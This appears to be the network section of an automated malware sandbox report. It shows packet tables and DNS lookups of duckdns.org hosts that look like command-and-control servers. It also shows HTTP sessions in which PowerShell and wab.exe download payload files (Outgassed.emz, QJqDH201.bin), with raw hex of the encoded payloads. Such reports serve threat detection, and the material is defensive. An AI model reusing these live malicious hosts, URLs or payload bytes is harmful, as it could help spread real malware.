Jul 2, 2024 07:47:58.799074888 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.799089909 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.799115896 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.799717903 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.799751043 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.799763918 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.799782991 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.799794912 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.799817085 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.799830914 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.799850941 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.799860001 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.799885988 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.799892902 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.799918890 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.799928904 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.799952030 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.799962997 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.799985886 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.799997091 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.800023079 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.800024986 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.800065994 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.800693035 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.800726891 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.800738096 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.800760031 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.800770044 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.800793886 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.800803900 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.800827026 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.800838947 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.800860882 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.800870895 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.800893068 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.800904989 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.800926924 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.800942898 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.800959110 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.800968885 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.800992012 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.801002979 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.801027060 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.801031113 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.801059961 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.801069021 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.801107883 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.801117897 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.801151991 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.801632881 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.801666021 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.801697016 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.801701069 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.801724911 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.801729918 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.801742077 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.801764011 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.801769972 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.801796913 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.801806927 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.801831961 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.801841974 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.801865101 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.801873922 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.801901102 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.801909924 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.801934004 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.801945925 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.801968098 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.801978111 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.802000046 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.802014112 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.802033901 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.802045107 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.802067041 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.802076101 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.802112103 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.802495956 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.802541971 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.802547932 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.802577019 CEST	80	49738	103.195.237.43	192.168.2.4
Jul 2, 2024 07:47:58.802588940 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:47:58.802618980 CEST	49738	80	192.168.2.4	103.195.237.43
Jul 2, 2024 07:48:03.165812016 CEST	49740	3980	192.168.2.4	206.123.148.198
Jul 2, 2024 07:48:03.170721054 CEST	3980	49740	206.123.148.198	192.168.2.4
Jul 2, 2024 07:48:03.170799971 CEST	49740	3980	192.168.2.4	206.123.148.198
Jul 2, 2024 07:48:03.172003031 CEST	49740	3980	192.168.2.4	206.123.148.198
Jul 2, 2024 07:48:03.177968979 CEST	3980	49740	206.123.148.198	192.168.2.4
Jul 2, 2024 07:48:24.552517891 CEST	3980	49740	206.123.148.198	192.168.2.4
Jul 2, 2024 07:48:24.552599907 CEST	49740	3980	192.168.2.4	206.123.148.198
Jul 2, 2024 07:48:24.552826881 CEST	49740	3980	192.168.2.4	206.123.148.198
Jul 2, 2024 07:48:24.554588079 CEST	49741	3981	192.168.2.4	206.123.148.198
Jul 2, 2024 07:48:24.557554960 CEST	3980	49740	206.123.148.198	192.168.2.4
Jul 2, 2024 07:48:24.559484005 CEST	3981	49741	206.123.148.198	192.168.2.4
Jul 2, 2024 07:48:24.559557915 CEST	49741	3981	192.168.2.4	206.123.148.198
Jul 2, 2024 07:48:24.565457106 CEST	49741	3981	192.168.2.4	206.123.148.198
Jul 2, 2024 07:48:24.570220947 CEST	3981	49741	206.123.148.198	192.168.2.4
Jul 2, 2024 07:48:45.931509018 CEST	3981	49741	206.123.148.198	192.168.2.4
Jul 2, 2024 07:48:45.931613922 CEST	49741	3981	192.168.2.4	206.123.148.198
Jul 2, 2024 07:48:45.932432890 CEST	49741	3981	192.168.2.4	206.123.148.198
Jul 2, 2024 07:48:45.937233925 CEST	3981	49741	206.123.148.198	192.168.2.4
Jul 2, 2024 07:48:47.071664095 CEST	49742	3980	192.168.2.4	206.123.148.198
Jul 2, 2024 07:48:47.076522112 CEST	3980	49742	206.123.148.198	192.168.2.4
Jul 2, 2024 07:48:47.076633930 CEST	49742	3980	192.168.2.4	206.123.148.198
Jul 2, 2024 07:48:47.077363014 CEST	49742	3980	192.168.2.4	206.123.148.198
Jul 2, 2024 07:48:47.082114935 CEST	3980	49742	206.123.148.198	192.168.2.4
Jul 2, 2024 07:49:08.494535923 CEST	3980	49742	206.123.148.198	192.168.2.4
Jul 2, 2024 07:49:08.494630098 CEST	49742	3980	192.168.2.4	206.123.148.198
Jul 2, 2024 07:49:08.496448040 CEST	49742	3980	192.168.2.4	206.123.148.198
Jul 2, 2024 07:49:08.501209974 CEST	3980	49742	206.123.148.198	192.168.2.4
Jul 2, 2024 07:49:08.635271072 CEST	49743	3981	192.168.2.4	206.123.148.198
Jul 2, 2024 07:49:08.640060902 CEST	3981	49743	206.123.148.198	192.168.2.4
Jul 2, 2024 07:49:08.640470028 CEST	49743	3981	192.168.2.4	206.123.148.198
Jul 2, 2024 07:49:09.648101091 CEST	49743	3981	192.168.2.4	206.123.148.198
Jul 2, 2024 07:49:09.767574072 CEST	3981	49743	206.123.148.198	192.168.2.4
Jul 2, 2024 07:49:09.767951012 CEST	49743	3981	192.168.2.4	206.123.148.198
Jul 2, 2024 07:49:10.618386030 CEST	49743	3981	192.168.2.4	206.123.148.198
Jul 2, 2024 07:49:10.623260975 CEST	3981	49743	206.123.148.198	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 07:47:04.104820967 CEST	56376	53	192.168.2.4	1.1.1.1
Jul 2, 2024 07:47:04.685590029 CEST	53	56376	1.1.1.1	192.168.2.4
Jul 2, 2024 07:48:03.053867102 CEST	64319	53	192.168.2.4	1.1.1.1
Jul 2, 2024 07:48:03.162692070 CEST	53	64319	1.1.1.1	192.168.2.4
Jul 2, 2024 07:48:45.933290958 CEST	62458	53	192.168.2.4	1.1.1.1
Jul 2, 2024 07:48:46.056292057 CEST	53	62458	1.1.1.1	192.168.2.4
Jul 2, 2024 07:49:08.510803938 CEST	64664	53	192.168.2.4	1.1.1.1
Jul 2, 2024 07:49:08.632836103 CEST	53	64664	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 2, 2024 07:47:04.104820967 CEST	192.168.2.4	1.1.1.1	0xbdd	Standard query (0)	contemega.com.do	A (IP address)	IN (0x0001)	false
Jul 2, 2024 07:48:03.053867102 CEST	192.168.2.4	1.1.1.1	0x4e6	Standard query (0)	janbours92harbu02.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 2, 2024 07:48:45.933290958 CEST	192.168.2.4	1.1.1.1	0xdb4b	Standard query (0)	janbours92harbu03.duckdns.org	A (IP address)	IN (0x0001)	false
Jul 2, 2024 07:49:08.510803938 CEST	192.168.2.4	1.1.1.1	0x98ef	Standard query (0)	janbours92harbu02.duckdns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 2, 2024 07:47:04.685590029 CEST	1.1.1.1	192.168.2.4	0xbdd	No error (0)	contemega.com.do		192.185.112.252	A (IP address)	IN (0x0001)	false
Jul 2, 2024 07:48:03.162692070 CEST	1.1.1.1	192.168.2.4	0x4e6	No error (0)	janbours92harbu02.duckdns.org		206.123.148.198	A (IP address)	IN (0x0001)	false
Jul 2, 2024 07:48:46.056292057 CEST	1.1.1.1	192.168.2.4	0xdb4b	Name error (3)	janbours92harbu03.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 2, 2024 07:49:08.632836103 CEST	1.1.1.1	192.168.2.4	0x98ef	No error (0)	janbours92harbu02.duckdns.org		206.123.148.198	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

contemega.com.do

103.195.237.43

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49738	103.195.237.43	80	6444	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 07:47:55.628334999 CEST	171	OUT	GET /QJqDH201.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: 103.195.237.43 Cache-Control: no-cache
Jul 2, 2024 07:47:56.589148998 CEST	1236	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Mon, 01 Jul 2024 13:00:50 GMT Accept-Ranges: bytes ETag: "d46e94b2b6cbda1:0" Server: Microsoft-IIS/8.5 Date: Tue, 02 Jul 2024 05:47:55 GMT Content-Length: 494656 Data Raw: 53 04 ab b3 4b 82 a7 b7 00 ad a5 b5 b1 e3 a5 54 39 f6 49 99 cf 22 0d d9 9e 24 11 f6 4a b1 dd ff 34 07 91 0c e9 d4 c6 11 86 dd 49 67 0a 56 46 16 bf dd 03 13 ae a9 93 f9 4a 7c 16 11 da 36 81 f1 db 01 e7 6b 86 5a 37 be 31 78 e1 89 2c 52 2f 3b 36 ac 49 2a de 32 2c 2d f1 67 14 0d 2c 14 06 5e 81 17 85 97 e0 80 50 b5 50 24 d0 d6 83 60 bb 9b 86 a4 68 ea b3 83 1b 9c 63 a6 d7 8d bd ec 13 f4 eb b3 ed 32 ee 47 8d c7 fd f0 56 25 3c 23 fe 63 f5 04 68 64 a0 95 79 eb f2 0e 54 cf 5c 79 8a e1 63 14 d5 46 bc a8 93 39 37 a0 03 5e 89 f6 56 30 56 5e 8d 0e 15 63 8c da ab 3a 56 81 0a c6 89 69 13 5c 7e 58 7c 4f 31 eb 44 7b a5 99 44 50 a7 05 6b da 58 64 9b c7 97 73 7c e3 ab 58 81 1a 37 9a f0 73 7c 4b 5b 32 e2 10 68 b0 6b 04 e0 3b 07 fe 38 f7 a4 b0 a6 9c 24 4a 3f 92 22 39 d0 50 cc b2 03 d2 9e 56 ab 97 7c 2a af ee 1b fe 58 bb 98 f0 24 67 9b 7d 04 83 92 e4 44 41 84 df 77 e8 fb 65 42 ec 39 3b 1b 63 67 2b a5 25 09 15 5f 06 1c 12 0d 8e 78 e6 8f b7 81 a8 bc 6d 6e 5c 2b 1a 75 9e ac d1 5c b1 f5 00 19 1b 86 18 70 7b 1c 88 b3 08 c9 e4 [TRUNCATED] Data Ascii: SKT9I"$J4IgVFJ\|6kZ71x,R/;6I2,-g,^PP$`hc2GV%<#chdyT\ycF97^V0V^c:Vi\~X\|O1D{DPkXds\|X7s\|K[2hk;8$J?"9PV\|X$g}DAweB9;cg+%_xmn\+u\p{ YUWF\G,qaU#WMy~hmzR+Z@e%t/{5u+6PcJj+L[ydX%B]Ef7J'Z^%(.>(+pW)+ C#LL;aV#eez<UHmhKxG~n}XCG;rj%xSG}r&>z9`-'%J.&MV0pSR8%gPF!&XZ_V<?D=\j)J~x,7F M'6.s>fr;{D>> k&9;/'"f$mp&{w0#Qx^v'Ge-ym7f3yb8 ` Co9;=p!Wd{!$X:H/~&;\|Vk(~BRXv:C$W:n
Jul 2, 2024 07:47:56.589178085 CEST	1236	IN	Data Raw: c9 f8 b5 b9 c2 55 56 2d fb 38 55 cf 7f e5 a4 30 c5 b6 ca 5a 26 ae c7 87 ad c2 34 2d 0a 4c eb a8 4b 5f 69 e6 f1 15 a4 b0 82 bb 80 e0 5a a1 8e ef 11 02 1b 9f 16 95 92 94 c3 26 f5 4d ac 9c ce 40 67 67 a2 82 b8 3d 8c e4 81 76 a2 82 ac 0c 41 56 af d8 Data Ascii: UV-8U0Z&4-LK_iZ&M@gg=vAVG~lMs2v\|HvjNOdpt7;ef%U6~FT(dnbG#mpg2FHY_D69xqVsY5mF;dc??^zk2R#
Jul 2, 2024 07:47:56.589219093 CEST	1236	IN	Data Raw: fd 70 50 a4 58 73 89 83 e0 03 62 37 87 48 45 1b 77 42 99 92 94 ab 03 74 08 ac 74 15 72 64 67 fb 41 d2 3d 35 64 d8 31 a2 6a f8 3e 41 56 c7 f7 c6 53 d5 96 13 39 03 1a 35 20 25 40 f1 35 3e 1d d6 ad 4c bb 83 c4 bd d2 8c b5 26 f6 23 70 3e dd 17 2f 67 Data Ascii: pPXsb7HEwBttrdgA=5d1j>AVS95 %@5>L&#p>/gn7%p~efUyUXVmT!5NfVg)Y,6:`Tki+o&g6h5Vu<:.V'25'jRNZ^EtEsazma\|4lo878+ARK;26OZO
Jul 2, 2024 07:47:56.589396954 CEST	672	IN	Data Raw: 8c e4 d8 fd 72 0f 20 28 dd 56 af d8 af 50 c0 7e d0 52 8b ca e1 6f 69 18 38 73 3e 9d 30 70 0a bb 25 5a ad cd 85 91 12 e1 1d d9 ac 98 4e 07 fb 4e 65 13 9e 74 8f b4 37 b2 0a fc b9 31 2a e9 aa 79 1e 40 6f e9 3e b6 20 4d fb fb 5d c2 2c 54 40 f5 f1 93 Data Ascii: r (VP~Roi8s>0p%ZNNet71y@o> M],T@5n2=bGAn:6c.p[q9YmL(b25\|$vWvi]heSKjObZ^iV1pE'g4BzI:VPN
Jul 2, 2024 07:47:56.589412928 CEST	1236	IN	Data Raw: 74 da c2 a7 e8 18 90 e0 7d f6 af ae d3 18 d5 e0 70 09 97 3a 3c c3 91 10 33 2d 77 4b 85 8a db f1 dc 39 82 e5 38 e7 70 d3 d8 1f 1b b4 51 ee f3 6d 7c 5c bf 6f b8 97 30 04 a2 9b ca 10 33 1d 3b e5 93 ca ca f4 93 f9 93 f9 47 1b 2d ee 15 96 35 9d 9e 10 Data Ascii: t}p:<3-wK98pQm\|\o03;G-5Z/?%ct_#.4xSOx{`Cc-{~@n(@7YM-*RBr>)z]pgp!i{D5Fny
Jul 2, 2024 07:47:56.589427948 CEST	224	IN	Data Raw: d6 80 6e 17 7f 79 96 f3 f2 db e3 43 b8 4f 78 80 24 10 e1 51 88 84 34 fb 7e 17 a4 54 73 8a 08 a4 7d d0 d8 48 56 76 7c a4 fb cb bc 18 9d 73 7d ce e2 e0 5a c7 1b 0c 49 d1 36 c7 bf 31 58 da bc 3b 7f 6b 3e 02 d2 c6 b1 24 a3 2e bc cc ee 8a 8b f8 19 53 Data Ascii: nyCOx$Q4~Ts}HVv\|s}ZI61X;k>$.SRNw%I}DeI-8aYoVI"?Y]=v]Oj{KC"&x'aEo,9KR)c7G)8{U<{tMOgB=cU"pp
Jul 2, 2024 07:47:56.834608078 CEST	1236	IN	Data Raw: de 1c 0d f2 83 82 19 e2 de 4c ca 99 e6 ad a5 e2 df cb ab 43 24 68 46 92 e4 2b 13 15 43 b4 dc cf fa 0f 82 ac dc 56 d4 e3 6f 28 8d bb a5 76 8c c3 03 cd af d6 67 8c 2d 21 81 cc 1f b7 5d a3 8e 3a b6 1a cf ba 7f 35 d3 e9 3e 20 a3 42 50 41 9d cf 10 bb Data Ascii: LC$hF+CVo(vg-!]:5> BPAq$ QV}'a/+S\|;IPW2e(KVG*m[ ~xL`nZTvK"pva?f!IL0N^A&'!~hWgLjs
Jul 2, 2024 07:47:56.834636927 CEST	1236	IN	Data Raw: d8 ed 35 07 68 78 c0 11 ed f0 20 50 90 f6 fa 53 30 bb 07 e2 4a 79 cf 6d ad bc 49 ed c3 30 67 cf 23 0a 9f 3c c1 c3 80 df 09 68 89 cf f4 de 0d 8b fa 1d 43 be 83 50 6d b9 24 bc 90 69 10 48 e9 eb 41 be 1c 7c 75 26 6a 3e 53 1b e9 2f 1a 99 c1 dd 2a f5 Data Ascii: 5hx PS0JymI0g#<hCPm$iHA\|u&j>S/*Cm{x_( ,B!{RD8(n"BRvhyV[zN>^n cw&zaI``oW@uOVUp9EPBdn
Jul 2, 2024 07:47:56.834655046 CEST	1236	IN	Data Raw: a2 60 b3 8c a3 e7 9c c8 13 39 10 b5 a1 cf 0a 06 18 f7 64 0e e8 36 a6 6d 39 f8 b2 43 f8 3d 70 24 8f 75 36 0b d2 59 6f 53 ac 63 57 02 4d 87 76 bb 61 5b dc 4a 30 8c e8 03 de 61 af 5c 28 20 5a e5 df b3 49 28 19 0d 53 cf 92 f4 a4 ae b8 e2 ea fc 25 fd Data Ascii: `9d6m9C=p$u6YoScWMva[J0a\( ZI(S%kLsH4^fC"#Zvfo91O=hhQ:""I!W;MS^BwAimkHk)%@ggiC~f@0%#/apl;s$iQ.S$B}4
Jul 2, 2024 07:47:56.834786892 CEST	1236	IN	Data Raw: 73 3c 63 0c 16 a6 ea 12 81 43 2a ae 4e de f4 07 8c 16 8c 4a f7 21 9e af 52 9e 5d 09 1a eb 1e 5d 2c 6c 45 af ce 11 30 a8 d5 d0 bd 8e f4 19 0a 02 b8 d3 f4 b4 a0 bf 25 0f 58 2c 37 23 27 ea cf 38 83 91 fe d3 11 27 6b f1 a7 1b a0 37 0b 76 43 52 1f 5b Data Ascii: s<cC*NJ!R]],lE0%X,7#'8'k7vCR[V@6J00OX0KEi.H(8B)~0y{}&lSc15km}5$=~LEiSu]6'^I)ssi<nUoboJX
Jul 2, 2024 07:47:56.834805012 CEST	1236	IN	Data Raw: 39 3d 6d 0b 2f 4a 0b d1 21 b0 c2 6a 75 58 b3 0b 45 5f 40 08 72 77 6e ff c7 30 2d e6 07 b6 ad 54 d3 33 fd c2 4f d6 7b 1a 34 09 cb 37 a2 c8 b9 96 ce d3 86 b2 43 35 95 82 ed f9 6e e7 44 d4 8f 3c 3d 21 2b 47 fb 6d de 01 97 4e 56 cf 3a 32 0a 2e 49 25 Data Ascii: 9=m/J!juXE_@rwn0-T3O{47C5nD<=!+GmNV:2.I%I:5D9m?r\}D"f8]}51aZy['R9/[%s"rQW.D.YA@g)\|N21Sy-w@T}eVX(6%@U{

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	192.185.112.252	443	4412	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-02 05:47:05 UTC	173	OUT	GET /Outgassed.emz HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: contemega.com.do Connection: Keep-Alive
2024-07-02 05:47:05 UTC	301	IN	HTTP/1.1 200 OK Date: Tue, 02 Jul 2024 05:47:05 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Mon, 01 Jul 2024 13:10:32 GMT Accept-Ranges: bytes Content-Length: 467780 content-Security-Policy: upgrade-insecure-requests Content-Type: application/x-msmetafile
2024-07-02 05:47:05 UTC	7891	IN	Data Raw: 32 66 36 62 32 2b 4c 72 51 62 4e 57 44 54 54 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 44 34 47 78 41 41 41 41 5a 67 39 30 39 47 59 50 33 66 58 72 58 4e 6d 72 71 43 56 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 6d 32 59 50 5a 73 50 5a 36 75 74 43 71 61 77 Data Ascii: 2f6b2+LrQbNWDTTW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbWD4GxAAAAZg909GYP3fXrXNmrqCV/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/f39/m2YPZsPZ6utCqaw
2024-07-02 05:47:05 UTC	8000	IN	Data Raw: 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 4a 49 54 59 32 67 2f 66 34 65 74 5a 57 6c 32 45 53 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 68 6d 44 33 58 56 5a 67 39 30 38 65 74 62 30 73 6d 59 46 73 4c 43 77 73 4c 43 77 73 4c 43 77 73 4c 43 77 73 Data Ascii: DQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDJITY2g/f4etZWl2ESMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMhmD3XVZg908etb0smYFsLCwsLCwsLCwsLCws
2024-07-02 05:47:05 UTC	8000	IN	Data Raw: 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4f 42 77 71 48 31 33 57 66 5a 35 57 59 50 34 74 33 72 57 66 57 59 67 6c 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 4e 44 51 30 44 34 47 59 41 41 41 41 32 66 73 50 5a 4d 62 72 50 63 6f 50 4d 45 38 4a 43 51 6b 4a 43 51 6b 4a 43 51 6b 4a 43 51 6b 4a 43 51 6b 4a 43 51 6b 4a 43 51 Data Ascii: zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzOBwqH13WfZ5WYP4t3rWfWYglQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0D4GYAAAA2fsPZMbrPcoPME8JCQkJCQkJCQkJCQkJCQkJCQkJCQ
